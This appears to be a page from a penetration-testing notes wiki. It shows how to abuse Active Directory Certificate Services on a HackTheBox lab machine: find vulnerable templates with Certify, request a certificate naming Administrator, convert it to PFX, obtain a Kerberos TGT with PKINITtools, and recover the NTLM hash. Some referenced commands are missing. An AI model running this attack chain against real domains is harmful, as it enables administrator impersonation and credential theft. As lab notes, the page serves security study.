AD CS

Certificate enrollment

Non-privileged users can request a certificate from the Enterprise Certificate Authority for any of the existing templates which are available for enrollment.

.\Certify.exe find /vulnerable

Certificate extraction

.\Certify.exe request /template:UserAuthentication /ca:dc.sequel.htb\sequel-DC-CA /altname:[email protected]
-----BEGIN RSA PRIVATE KEY-----
[...]
-----END CERTIFICATE-----

User persistence

Certificates that have been exported in .pem format can be converted to .pfx in order to be compatible with Rubeus and installed directly into the certificate store. This is because certificates in .pfx format are similar to archives and contain all the necessary information to be deployed on the system.

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

A Ticket Granting Ticket (TGT) can be requested with Rubeus from the Kerberos Key Distribution Center (KDC) for the enrolled user.

Similarly to Rubeus the TGT can be obtained using the “gettgtpkinit.py” by supplying the pfx certificate and the user which the certificate has been issued. This script will output a TGT into the specified ccache file.

python3 gettgtpkinit.py sequel.htb/Administrator -cert-pfx ~/HTB/Machines/Escape/cert.pfx ticket.ccache -dc-ip 10.10.11.202

To use getnthash.py, set the TGT file path in the KRB5CCNAME environment variable.

The AES-REP encryption key which has been retrieved previously can be used with the getnthash.py utility in order to recover the NTLM hash from the PAC.

Github repository: https://github.com/dirkjanm/PKINITtools

Sometimes, the following error is obtained when using the PKINIT tools:

In that case, run the following command:

PreviousPassword CrackingNextGoogle Dorks

Last updated